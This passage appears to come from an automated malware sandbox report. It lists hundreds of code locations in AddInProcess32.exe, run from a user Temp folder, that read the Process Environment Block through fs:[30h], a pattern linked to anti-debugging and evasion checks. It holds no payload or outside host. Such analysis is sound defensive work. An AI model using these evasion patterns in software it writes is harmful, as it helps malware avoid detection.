          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0133B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01393540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01341DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01341DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01341DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013435A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01342990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0133C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01342581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01342581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01342581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01342581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01312D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01312D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01312D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01312D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01312D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013C8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013A41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0132D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0132D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01396DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01396DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01396DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01396DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01396DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01396DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0132B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0132B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0132B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0132B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01397016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01397016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01397016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01396C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01396C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01396C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01396C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0133746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01330050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01330050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013AC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013AC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013590AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0132849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01319080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01393884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01393884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01396CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01396CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01396CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013158EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013AB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01314F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01314F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0133F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013AFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013AFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01343B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01343B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0132FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0132EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01344BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01344BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01344BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01342397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01328794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01397794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01397794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01397794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013CD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01321B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01321B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013537F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0133DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013CFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01354A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01354A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01315210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01315210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01315210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01315210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01333A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0131C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01348E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01328A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0133AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0133AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0133AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0133AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0133AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0135927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013CB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013CB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0132766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013DEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013A4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01319240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01319240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01319240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01319240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01327E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01327E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01327E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01327E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01327E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01327E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0132AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0132AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013946A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013AFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013276E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01342AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013416E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01358EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013436CC mov eax, dword ptr fs:[00000030h]
